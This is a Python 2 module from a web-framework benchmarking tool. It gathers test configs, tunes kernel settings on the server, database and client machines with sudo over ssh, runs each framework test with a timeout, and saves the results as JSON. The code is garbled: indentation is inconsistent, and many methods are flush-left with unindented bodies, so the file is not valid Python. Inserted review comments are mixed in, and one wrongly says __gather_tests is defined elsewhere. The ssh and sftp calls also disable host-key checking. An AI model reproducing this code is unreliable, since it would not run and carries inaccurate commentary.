    # NOTE(review): json.dumps over map() only works on Python 2, where map
    # returns a list — consistent with the print statements in this module.
    all_tests_json = json.dumps(map(lambda test: {
      "name": test.name,
      "approach": test.approach,
      "classification": test.classification,
      "database": test.database,
      "framework": test.framework,
      "language": test.language,
      "orm": test.orm,
      "platform": test.platform,
      "webserver": test.webserver,
      "os": test.os,
      "database_os": test.database_os,
      "display_name": test.display_name,
      "notes": test.notes,
      "versus": test.versus
    }, all_tests))
    with open(os.path.join(self.full_results_directory(), "test_metadata.json"), "w") as f:
      f.write(all_tests_json)
    self.__finish()
############################################################
# End run_list_test_metadata
############################################################
############################################################
# parse_timestamp
# Re-parses the raw data for a given timestamp
############################################################
def parse_timestamp(self):
all_tests = self.__gather_tests
for test in all_tests:
test.parse_all()
self.__parse_results(all_tests)
self.__finish()
############################################################
# End parse_timestamp
############################################################
############################################################
# Run the tests:
# This process involves setting up the client/server machines
# with any necessary change. Then going through each test,
# running their setup script, verifying the URLs, and
# running benchmarks against them.
############################################################
  def run(self):
    """Run the suite: discover tests, prepare the server/database/client
    machines, execute every test, and (in benchmark mode) parse results.
    """
    ##########################
    # Get a list of all known
    # tests that we can run.
    ##########################
    all_tests = self.__gather_tests
    ##########################
    # Setup client/server
    ##########################
    print textwrap.dedent("""
      =====================================================
      Preparing Server, Database, and Client ...
      =====================================================
      """)
    self.__setup_server()
    self.__setup_database()
    self.__setup_client()
    ## Check if wrk (and wrk-pipeline) is installed and executable, if not, raise an exception
    #if not (os.access("/usr/local/bin/wrk", os.X_OK) and os.access("/usr/local/bin/wrk-pipeline", os.X_OK)):
    #  raise Exception("wrk and/or wrk-pipeline are not properly installed. Not running tests.")
    ##########################
    # Run tests
    ##########################
    print textwrap.dedent("""
      =====================================================
      Running Tests ...
      =====================================================
      """)
    self.__run_tests(all_tests)
    ##########################
    # Parse results
    ##########################
    if self.mode == "benchmark":
      print textwrap.dedent("""
        =====================================================
        Parsing Results ...
        =====================================================
        """)
      self.__parse_results(all_tests)
    self.__finish()
############################################################
# End run
############################################################
############################################################
# database_sftp_string(batch_file)
# generates a fully qualified URL for sftp to database
############################################################
def database_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.database_identity_file != None:
sftp_string += " -i " + self.database_identity_file + " "
return sftp_string + self.database_user + "@" + self.database_host
############################################################
# End database_sftp_string
############################################################
############################################################
# client_sftp_string(batch_file)
# generates a fully qualified URL for sftp to client
############################################################
def client_sftp_string(self, batch_file):
sftp_string = "sftp -oStrictHostKeyChecking=no "
if batch_file != None: sftp_string += " -b " + batch_file + " "
if self.client_identity_file != None:
sftp_string += " -i " + self.client_identity_file + " "
return sftp_string + self.client_user + "@" + self.client_host
############################################################
# End client_sftp_string
############################################################
############################################################
# generate_url(url, port)
# generates a fully qualified URL for accessing a test url
############################################################
def generate_url(self, url, port):
return self.server_host + ":" + str(port) + url
############################################################
# End generate_url
############################################################
############################################################
# get_output_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_output_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "raw")
############################################################
# End get_output_file
############################################################
############################################################
# output_file(test_name, test_type)
# returns the output file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def output_file(self, test_name, test_type):
path = self.get_output_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End output_file
############################################################
############################################################
# get_warning_file(test_name, test_type)
# returns the output file name for this test_name and
# test_type timestamp/test_type/test_name/raw
############################################################
def get_warning_file(self, test_name, test_type):
return os.path.join(self.result_directory, self.timestamp, test_type, test_name, "warn")
############################################################
# End get_warning_file
############################################################
############################################################
# warning_file(test_name, test_type)
# returns the warning file for this test_name and test_type
# timestamp/test_type/test_name/raw
############################################################
def warning_file(self, test_name, test_type):
path = self.get_warning_file(test_name, test_type)
try:
os.makedirs(os.path.dirname(path))
except OSError:
pass
return path
############################################################
# End warning_file
############################################################
############################################################
# full_results_directory
############################################################
def full_results_directory(self):
path = os.path.join(self.result_directory, self.timestamp)
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# End full_results_directory
############################################################
############################################################
# Latest intermediate results dirctory
############################################################
def latest_results_directory(self):
path = os.path.join(self.result_directory,"latest")
try:
os.makedirs(path)
except OSError:
pass
return path
############################################################
# report_results
############################################################
  def report_results(self, framework, test, results):
    """Record parsed results for (framework, test) into self.results.

    A non-empty results object marks the framework as succeeded (and as a
    warning when a warn file exists); an empty one marks it as failed.
    """
    if test not in self.results['rawData'].keys():
      self.results['rawData'][test] = dict()
    # If results has a size from the parse, then it succeeded.
    if results:
      self.results['rawData'][test][framework.name] = results
      # This may already be set for single-tests
      if framework.name not in self.results['succeeded'][test]:
        self.results['succeeded'][test].append(framework.name)
      # Add this type
      if (os.path.exists(self.get_warning_file(framework.name, test)) and
          framework.name not in self.results['warning'][test]):
        self.results['warning'][test].append(framework.name)
    else:
      # This may already be set for single-tests
      if framework.name not in self.results['failed'][test]:
        self.results['failed'][test].append(framework.name)
############################################################
# End report_results
############################################################
##########################################################################################
# Private methods
##########################################################################################
############################################################
# Gathers all the tests
############################################################
  @property
  def __gather_tests(self):
    """Discover every benchmark test defined by a */benchmark_config file.

    Returns the tests sorted by name; when self.test is set, only the tests
    whose names appear in it are returned.
    """
    tests = []
    # Assume we are running from FrameworkBenchmarks
    config_files = glob.glob('*/benchmark_config')
    for config_file_name in config_files:
      # Look for the benchmark_config file, this will set up our tests.
      # Its format looks like this:
      #
      # {
      #   "framework": "nodejs",
      #   "tests": [{
      #     "default": {
      #       "setup_file": "setup",
      #       "json_url": "/json"
      #     },
      #     "mysql": {
      #       "setup_file": "setup",
      #       "db_url": "/mysql",
      #       "query_url": "/mysql?queries="
      #     },
      #     ...
      #   }]
      # }
      config = None
      with open(config_file_name, 'r') as config_file:
        # Load json file into config object
        try:
          config = json.load(config_file)
        except:
          print("Error loading '%s'." % config_file_name)
          raise
      if config is None:
        continue
      test = framework_test.parse_config(config, os.path.dirname(config_file_name), self)
      # If the user specified which tests to run, then
      # we can skip over tests that are not in that list
      if self.test == None:
        tests = tests + test
      else:
        for atest in test:
          if atest.name in self.test:
            tests.append(atest)
    tests.sort(key=lambda x: x.name)
    return tests
############################################################
# End __gather_tests
############################################################
############################################################
# Gathers all the frameworks
############################################################
def __gather_frameworks(self):
frameworks = []
# Loop through each directory (we assume we're being run from the benchmarking root)
for dirname, dirnames, filenames in os.walk('.'):
# Look for the benchmark_config file, this will contain our framework name
# It's format looks like this:
#
# {
# "framework": "nodejs",
# "tests": [{
# "default": {
# "setup_file": "setup",
# "json_url": "/json"
# },
# "mysql": {
# "setup_file": "setup",
# "db_url": "/mysql",
# "query_url": "/mysql?queries="
# },
# ...
# }]
# }
if 'benchmark_config' in filenames:
config = None
with open(os.path.join(dirname, 'benchmark_config'), 'r') as config_file:
# Load json file into config object
config = json.load(config_file)
if config == None:
continue
frameworks.append(str(config['framework']))
return frameworks
############################################################
# End __gather_frameworks
############################################################
############################################################
# Makes any necessary changes to the server that should be
# made before running the tests. This involves setting kernal
# settings to allow for more connections, or more file
# descriptiors
#
# http://redmine.lighttpd.net/projects/weighttp/wiki#Troubleshooting
############################################################
  def __setup_server(self):
    """Tune CPU governor, network and kernel settings on the local server.

    Returns True (no-op) on Windows and False if any command fails; on
    success the return value is implicitly None.
    """
    try:
      if os.name == 'nt':
        return True
      # Force all CPUs to the "performance" frequency governor
      subprocess.check_call(["sudo","bash","-c","cd /sys/devices/system/cpu; ls -d cpu[0-9]*|while read x; do echo performance > $x/cpufreq/scaling_governor; done"])
      subprocess.check_call("sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535".rsplit(" "))
      subprocess.check_call("sudo sysctl -w net.core.somaxconn=65535".rsplit(" "))
      subprocess.check_call("sudo -s ulimit -n 65535".rsplit(" "))
      subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_reuse=1".rsplit(" "))
      subprocess.check_call("sudo sysctl net.ipv4.tcp_tw_recycle=1".rsplit(" "))
      subprocess.check_call("sudo sysctl -w kernel.shmmax=134217728".rsplit(" "))
      subprocess.check_call("sudo sysctl -w kernel.shmall=2097152".rsplit(" "))
    except subprocess.CalledProcessError:
      return False
############################################################
# End __setup_server
############################################################
############################################################
# Makes any necessary changes to the database machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include database specific
# changes.
############################################################
def __setup_database(self):
    """
    Apply kernel tuning on the database machine over ssh before the tests
    run.  Mirrors __setup_server, with database-appropriate shared-memory
    limits; commands are piped to a remote shell via stdin.
    """
    tuning_commands = """
    sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
    sudo sysctl -w net.core.somaxconn=65535
    sudo -s ulimit -n 65535
    sudo sysctl net.ipv4.tcp_tw_reuse=1
    sudo sysctl net.ipv4.tcp_tw_recycle=1
    sudo sysctl -w kernel.shmmax=2147483648
    sudo sysctl -w kernel.shmall=2097152
    """
    remote_shell = subprocess.Popen(self.database_ssh_string,
                                    stdin=subprocess.PIPE, shell=True)
    remote_shell.communicate(tuning_commands)
############################################################
# End __setup_database
############################################################
############################################################
# Makes any necessary changes to the client machine that
# should be made before running the tests. Is very similar
# to the server setup, but may also include client specific
# changes.
############################################################
def __setup_client(self):
    """
    Apply kernel tuning on the client (load-generator) machine over ssh
    before the tests run.  Very similar to the server setup; commands are
    piped to a remote shell via stdin.
    """
    remote_shell = subprocess.Popen(self.client_ssh_string,
                                    stdin=subprocess.PIPE, shell=True)
    remote_shell.communicate("""
    sudo sysctl -w net.ipv4.tcp_max_syn_backlog=65535
    sudo sysctl -w net.core.somaxconn=65535
    sudo -s ulimit -n 65535
    sudo sysctl net.ipv4.tcp_tw_reuse=1
    sudo sysctl net.ipv4.tcp_tw_recycle=1
    sudo sysctl -w kernel.shmmax=2147483648
    sudo sysctl -w kernel.shmall=2097152
    """)
############################################################
# End __setup_client
############################################################
############################################################
# __run_tests
#
# 2013-10-02 ASB Calls each test passed in tests to
# __run_test in a separate process. Each
# test is given a set amount of time and if
# kills the child process (and subsequently
# all of its child processes). Uses
# multiprocessing module.
############################################################
def __run_tests(self, tests):
logging.debug("Start __run_tests.")
logging.debug("__name__ = %s",__name__)
if self.os.lower() == 'windows':
logging.debug("Executing __run_tests on Windows")
for test in tests:
self.__run_test(test)
else:
logging.debug("Executing __run_tests on Linux")
# These features do not work on Windows
for test in tests:
if __name__ == 'benchmark.benchmarker':
print textwrap.dedent("""
-----------------------------------------------------
Running Test: {name} ...
-----------------------------------------------------
""".format(name=test.name))
test_process = Process(target=self.__run_test, args=(test,))
test_process.start()
test_process.join(self.run_test_timeout_seconds)
if(test_process.is_alive()):
logging.debug("Child process for {name} is still alive. Terminating.".format(name=test.name))
self.__write_intermediate_results(test.name,"__run_test timeout (="+ str(self.run_test_timeout_seconds) + " seconds)")
test_process.terminate()
logging.debug("End __run_tests.")
############################################################
# End __run_tests
############################################################
############################################################
# __run_test
# 2013-10-02 ASB Previously __run_tests. This code now only
# processes a single test.
#
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __run_test(self, test):
    """
    Run a single framework test end-to-end: skip checks, database restart,
    port sanity check, start, URL verification, optional benchmark, stop,
    and intermediate-result bookkeeping.  All output goes to per-test
    logs/<name>/out.txt and err.txt under the latest results directory.
    """
    # Create the per-test log directory; it may already exist from a prior run.
    try:
        os.makedirs(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name)))
    except:
        pass
    with open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'out.txt'), 'w') as out, \
            open(os.path.join(self.latest_results_directory, 'logs', "{name}".format(name=test.name), 'err.txt'), 'w') as err:
        # Honor an explicit skip flag in the test's benchmark_config.
        if hasattr(test, 'skip'):
            if test.skip.lower() == "true":
                out.write("Test {name} benchmark_config specifies to skip this test. Skipping.\n".format(name=test.name))
                return
        if test.os.lower() != self.os.lower() or test.database_os.lower() != self.database_os.lower():
            # the operating system requirements of this test for the
            # application server or the database server don't match
            # our current environment
            out.write("OS or Database OS specified in benchmark_config does not match the current environment. Skipping.\n")
            return
        # If the test is in the excludes list, we skip it
        if self.exclude != None and test.name in self.exclude:
            out.write("Test {name} has been added to the excludes list. Skipping.\n".format(name=test.name))
            return
        # If the test does not contain an implementation of the current test-type, skip it
        if self.type != 'all' and not test.contains_type(self.type):
            out.write("Test type {type} does not contain an implementation of the current test-type. Skipping.\n".format(type=self.type))
            return
        out.write("test.os.lower() = {os} test.database_os.lower() = {dbos}\n".format(os=test.os.lower(),dbos=test.database_os.lower()))
        out.write("self.results['frameworks'] != None: {val}\n".format(val=str(self.results['frameworks'] != None)))
        out.write("test.name: {name}\n".format(name=str(test.name)))
        out.write("self.results['completed']: {completed}\n".format(completed=str(self.results['completed'])))
        # Resume support: skip anything already recorded as completed.
        if self.results['frameworks'] != None and test.name in self.results['completed']:
            out.write('Framework {name} found in latest saved data. Skipping.\n'.format(name=str(test.name)))
            return
        out.flush()
        out.write( textwrap.dedent("""
            =====================================================
            Beginning {name}
            -----------------------------------------------------
            """.format(name=test.name)) )
        out.flush()
        ##########################
        # Start this test
        ##########################
        out.write( textwrap.dedent("""
            -----------------------------------------------------
            Starting {name}
            -----------------------------------------------------
            """.format(name=test.name)) )
        out.flush()
        try:
            # Restart the database services remotely so each test starts
            # from a clean slate.
            if test.requires_database():
                p = subprocess.Popen(self.database_ssh_string, stdin=subprocess.PIPE, stdout=out, stderr=err, shell=True)
                p.communicate("""
                sudo restart mysql
                sudo restart mongodb
                sudo /etc/init.d/postgresql restart
                """)
                time.sleep(10)
            # If a previous test left the port bound, starting would fail.
            if self.__is_port_bound(test.port):
                self.__write_intermediate_results(test.name, "port " + str(test.port) + " is not available before start")
                err.write( textwrap.dedent("""
                    ---------------------------------------------------------
                    Error: Port {port} is not available before start {name}
                    ---------------------------------------------------------
                    """.format(name=test.name, port=str(test.port))) )
                err.flush()
                return
            result = test.start(out, err)
            if result != 0:
                test.stop(out, err)
                time.sleep(5)
                err.write( "ERROR: Problem starting {name}\n".format(name=test.name) )
                err.write( textwrap.dedent("""
                    -----------------------------------------------------
                    Stopped {name}
                    -----------------------------------------------------
                    """.format(name=test.name)) )
                err.flush()
                self.__write_intermediate_results(test.name,"<setup.py>#start() returned non-zero")
                return
            time.sleep(self.sleep)
            ##########################
            # Verify URLs
            ##########################
            test.verify_urls(out, err)
            out.flush()
            err.flush()
            ##########################
            # Benchmark this test
            ##########################
            if self.mode == "benchmark":
                out.write( textwrap.dedent("""
                    -----------------------------------------------------
                    Benchmarking {name} ...
                    -----------------------------------------------------
                    """.format(name=test.name)) )
                out.flush()
                test.benchmark(out, err)
                out.flush()
                err.flush()
            ##########################
            # Stop this test
            ##########################
            out.write( textwrap.dedent("""
                -----------------------------------------------------
                Stopping {name}
                -----------------------------------------------------
                """.format(name=test.name)) )
            out.flush()
            test.stop(out, err)
            out.flush()
            err.flush()
            time.sleep(5)
            # A port still bound after stop means the server didn't shut down.
            if self.__is_port_bound(test.port):
                self.__write_intermediate_results(test.name, "port " + str(test.port) + " was not released by stop")
                err.write( textwrap.dedent("""
                    -----------------------------------------------------
                    Error: Port {port} was not released by stop {name}
                    -----------------------------------------------------
                    """.format(name=test.name, port=str(test.port))) )
                err.flush()
                return
            out.write( textwrap.dedent("""
                -----------------------------------------------------
                Stopped {name}
                -----------------------------------------------------
                """.format(name=test.name)) )
            out.flush()
            time.sleep(5)
            ##########################################################
            # Save results thus far into toolset/benchmark/latest.json
            ##########################################################
            out.write( textwrap.dedent("""
                ----------------------------------------------------
                Saving results through {name}
                ----------------------------------------------------
                """.format(name=test.name)) )
            out.flush()
            self.__write_intermediate_results(test.name,time.strftime("%Y%m%d%H%M%S", time.localtime()))
        except (OSError, IOError, subprocess.CalledProcessError) as e:
            self.__write_intermediate_results(test.name,"<setup.py> raised an exception")
            err.write( textwrap.dedent("""
                -----------------------------------------------------
                Subprocess Error {name}
                -----------------------------------------------------
                {err}
                {trace}
                """.format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
            err.flush()
            try:
                test.stop(out, err)
            except (subprocess.CalledProcessError) as e:
                self.__write_intermediate_results(test.name,"<setup.py>#stop() raised an error")
                err.write( textwrap.dedent("""
                    -----------------------------------------------------
                    Subprocess Error: Test .stop() raised exception {name}
                    -----------------------------------------------------
                    {err}
                    {trace}
                    """.format(name=test.name, err=e, trace=sys.exc_info()[:2])) )
                err.flush()
        except (KeyboardInterrupt, SystemExit) as e:
            # FIX: originally called test.stop(out) with a single argument,
            # while every other call site passes (out, err) — the missing
            # argument made Ctrl-C cleanup raise a TypeError.
            test.stop(out, err)
            out.write( """
            -----------------------------------------------------
            Cleaning up....
            -----------------------------------------------------
            """)
            out.flush()
            self.__finish()
            sys.exit()
        # Redundant with the `with` block but kept from the original.
        out.close()
        err.close()
############################################################
# End __run_tests
############################################################
############################################################
# __is_port_bound
# Check if the requested port is available. If it
# isn't available, then a previous test probably didn't
# shutdown properly.
############################################################
def __is_port_bound(self, port):
    """
    Return True if *port* appears to be bound on this machine.

    A previous test that did not shut down cleanly will usually leave its
    port bound; callers use this both before starting a test (port must be
    free) and after stopping it (port must be released).
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        # Try to bind to all IP addresses, this port.  Success means the
        # port is free.
        s.bind(("", port))
    # FIX: the original used bare `except:` here and below, which also
    # swallows KeyboardInterrupt/SystemExit; socket operations raise
    # socket.error, so catch exactly that.
    except socket.error:
        # Bind failed: the port may still be bound (bad), or it may be a
        # privileged port (<1024) and we are not root, or the server is
        # gone but sockets linger in TIME_WAIT (SO_REUSEADDR).  Try to
        # connect to tell these apart.
        try:
            s.connect(("127.0.0.1", port))
            # Connected to something, so the port is still bound.
            return True
        except socket.error:
            # Couldn't connect either; no server is listening there.
            pass
    finally:
        s.close()
    return False
############################################################
# End __is_port_bound
############################################################
############################################################
# __parse_results
# Ensures that the system has all necessary software to run
# the tests. This does not include that software for the individual
# test, but covers software such as curl and weighttp that
# are needed.
############################################################
def __parse_results(self, tests):
    """
    Aggregate per-framework statistics (commit counts, then source line
    counts) into self.results and write the combined JSON file for this
    run to <full_results_directory>/results.json.
    """
    # Gather the commit count of each framework.
    self.__count_commits()
    # Gather the source-line count of each framework.
    self.__count_sloc()
    # Persist the aggregate JSON file.
    results_path = os.path.join(self.full_results_directory(), "results.json")
    with open(results_path, "w") as results_file:
        results_file.write(json.dumps(self.results))
############################################################
# End __parse_results
############################################################
#############################################################
# __count_sloc
# This is assumed to be run from the benchmark root directory
#############################################################
def __count_sloc(self):
    """
    Count the source lines of code for each framework with `cloc` and
    store the per-framework totals in self.results['rawData']['slocCounts'].
    Assumed to run from the benchmark root directory; frameworks that fail
    (missing source_code file, unparsable output) are skipped best-effort.
    """
    all_frameworks = self.__gather_frameworks()
    jsonResult = {}
    for framework in all_frameworks:
        try:
            # FIX: __gather_frameworks returns plain framework-name strings
            # (it appends str(config['framework'])), which double as the
            # directory names — see __count_commits.  The original indexed
            # framework['directory'] / framework['name'], which raises
            # TypeError on a str; the bare except below swallowed it, so
            # slocCounts always came out empty.
            command = "cloc --list-file=" + framework + "/source_code --yaml"
            lineCount = subprocess.check_output(command, shell=True)
            # Find the last instance of the word 'code' in the yaml output. This should
            # be the line count for the sum of all listed files or just the line count
            # for the last file in the case where there's only one file listed.
            lineCount = lineCount[lineCount.rfind('code'):len(lineCount)]
            lineCount = lineCount.strip('code: ')
            lineCount = lineCount[0:lineCount.rfind('comment')]
            jsonResult[framework] = int(lineCount)
        except:
            # Best-effort: a framework we can't count is simply omitted.
            continue
    self.results['rawData']['slocCounts'] = jsonResult
############################################################
# End __count_sloc
############################################################
############################################################
# __count_commits
############################################################
def __count_commits(self):
    """
    Count the git commits touching each framework's directory and store
    the per-framework totals in self.results['rawData']['commitCounts']
    (also kept on self.commits).  Frameworks that fail are skipped.
    """
    commit_counts = {}
    for framework in self.__gather_frameworks():
        shell_cmd = "git rev-list HEAD -- " + framework + " | sort -u | wc -l"
        try:
            raw_count = subprocess.check_output(shell_cmd, shell=True)
            commit_counts[framework] = int(raw_count)
        except:
            # Best-effort: a framework we can't count is simply omitted.
            continue
    self.results['rawData']['commitCounts'] = commit_counts
    self.commits = commit_counts
############################################################
# End __count_commits
############################################################
############################################################
# __write_intermediate_results
############################################################
def __write_intermediate_results(self, test_name, status_message):
    """
    Record *status_message* for *test_name* under self.results['completed']
    and persist the whole results object to the latest results directory's
    results.json.  A write failure is logged, not raised.
    """
    try:
        self.results["completed"][test_name] = status_message
        results_path = os.path.join(self.latest_results_directory, 'results.json')
        with open(results_path, 'w') as results_file:
            results_file.write(json.dumps(self.results))
    except IOError:
        logging.error("Error writing results.json")
############################################################
# End __write_intermediate_results
############################################################
############################################################
# __finish
############################################################
def __finish(self):
print "Time to complete: " + str(int(time.time() - self.start_time)) + " seconds"
print "Results are saved in " + os.path.join(self.result_directory, self.timestamp)
############################################################
# End __finish
############################################################
##########################################################################################
# Constructor
##########################################################################################
############################################################
# Initialize the benchmarker. The args are the arguments
# parsed via argparser.
############################################################
def __init__(self, args):
    """
    Initialize the benchmarker.

    ``args`` is a mapping of configuration options (per the banner above,
    parsed via argparser); every key/value becomes an attribute on this
    instance via ``__dict__.update``.
    """
    # Adopt every option as an instance attribute (name, os, mode,
    # client_user, max_concurrency, parse, install_software, ...).
    self.__dict__.update(args)
    self.start_time = time.time()
    # Per-test wall-clock ceiling enforced by __run_tests (1 hour).
    self.run_test_timeout_seconds = 3600
    # setup logging
    logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
    # setup some additional variables
    # Database connection settings fall back to the client machine's values.
    if self.database_user == None: self.database_user = self.client_user
    if self.database_host == None: self.database_host = self.client_host
    if self.database_identity_file == None: self.database_identity_file = self.client_identity_file
    # setup results and latest_results directories
    self.result_directory = os.path.join("results", self.name)
    # NOTE(review): this replaces the bound method with its return value,
    # so latest_results_directory() can only ever be called this once.
    self.latest_results_directory = self.latest_results_directory()
    # When re-parsing an existing run (--parse TIMESTAMP), reuse that
    # run's timestamp; otherwise stamp a fresh one.
    if self.parse != None:
        self.timestamp = self.parse
    else:
        self.timestamp = time.strftime("%Y%m%d%H%M%S", time.localtime())
    # Setup the concurrency levels array. This array goes from
    # starting_concurrency to max concurrency, doubling each time
    self.concurrency_levels = []
    concurrency = self.starting_concurrency
    while concurrency <= self.max_concurrency:
        self.concurrency_levels.append(concurrency)
        concurrency = concurrency * 2
    # Setup query interval array
    # starts at 1, and goes up to max_queries, using the query_interval
    # (the `queries == 1` reset makes the series 1, query_interval,
    # 2*query_interval, ... rather than 1, 1+interval, ...)
    self.query_intervals = []
    queries = 1
    while queries <= self.max_queries:
        self.query_intervals.append(queries)
        if queries == 1:
            queries = 0
        queries = queries + self.query_interval
    # Load the latest data
    #self.latest = None
    #try:
    #  with open('toolset/benchmark/latest.json', 'r') as f:
    #    # Load json file into config object
    #    self.latest = json.load(f)
    #    logging.info("toolset/benchmark/latest.json loaded to self.latest")
    #    logging.debug("contents of latest.json: " + str(json.dumps(self.latest)))
    #except IOError:
    #  logging.warn("IOError on attempting to read toolset/benchmark/latest.json")
    #
    #self.results = None
    #try:
    #  if self.latest != None and self.name in self.latest.keys():
    #    with open(os.path.join(self.result_directory, str(self.latest[self.name]), 'results.json'), 'r') as f:
    #      # Load json file into config object
    #      self.results = json.load(f)
    #except IOError:
    #  pass
    # Resume support: reload any previous results.json from the latest
    # results directory; a missing file just means a fresh run.
    self.results = None
    try:
        with open(os.path.join(self.latest_results_directory, 'results.json'), 'r') as f:
            #Load json file into results object
            self.results = json.load(f)
    except IOError:
        logging.warn("results.json for test %s not found.",self.name)
    if self.results == None:
        # Fresh run: build the full results skeleton with empty buckets
        # for each test type's raw data and pass/fail/warning lists.
        self.results = dict()
        self.results['name'] = self.name
        self.results['concurrencyLevels'] = self.concurrency_levels
        self.results['queryIntervals'] = self.query_intervals
        # __gather_tests is defined elsewhere in this class — presumably a
        # property yielding test objects; verify against the full file.
        self.results['frameworks'] = [t.name for t in self.__gather_tests]
        self.results['duration'] = self.duration
        self.results['rawData'] = dict()
        self.results['rawData']['json'] = dict()
        self.results['rawData']['db'] = dict()
        self.results['rawData']['query'] = dict()
        self.results['rawData']['fortune'] = dict()
        self.results['rawData']['update'] = dict()
        self.results['rawData']['plaintext'] = dict()
        self.results['completed'] = dict()
        self.results['succeeded'] = dict()
        self.results['succeeded']['json'] = []
        self.results['succeeded']['db'] = []
        self.results['succeeded']['query'] = []
        self.results['succeeded']['fortune'] = []
        self.results['succeeded']['update'] = []
        self.results['succeeded']['plaintext'] = []
        self.results['failed'] = dict()
        self.results['failed']['json'] = []
        self.results['failed']['db'] = []
        self.results['failed']['query'] = []
        self.results['failed']['fortune'] = []
        self.results['failed']['update'] = []
        self.results['failed']['plaintext'] = []
        self.results['warning'] = dict()
        self.results['warning']['json'] = []
        self.results['warning']['db'] = []
        self.results['warning']['query'] = []
        self.results['warning']['fortune'] = []
        self.results['warning']['update'] = []
        self.results['warning']['plaintext'] = []
    else:
        #for x in self.__gather_tests():
        #  if x.name not in self.results['frameworks']:
        #    self.results['frameworks'] = self.results['frameworks'] + [x.name]
        # Always overwrite framework list
        self.results['frameworks'] = [t.name for t in self.__gather_tests]
    # Setup the ssh command string
    self.database_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.database_user + "@" + self.database_host
    self.client_ssh_string = "ssh -T -o StrictHostKeyChecking=no " + self.client_user + "@" + self.client_host
    if self.database_identity_file != None:
        self.database_ssh_string = self.database_ssh_string + " -i " + self.database_identity_file
    if self.client_identity_file != None:
        self.client_ssh_string = self.client_ssh_string + " -i " + self.client_identity_file
    # Optionally provision all required software (Installer is defined
    # elsewhere in the project).
    if self.install_software:
        install = Installer(self)
        install.install_software()
############################################################
# End __init__
############################################################
# NOTE(review): removed trailing non-source residue ("Subsets and Splits" /
# dataset-viewer boilerplate) that was appended to the file and is not valid Python.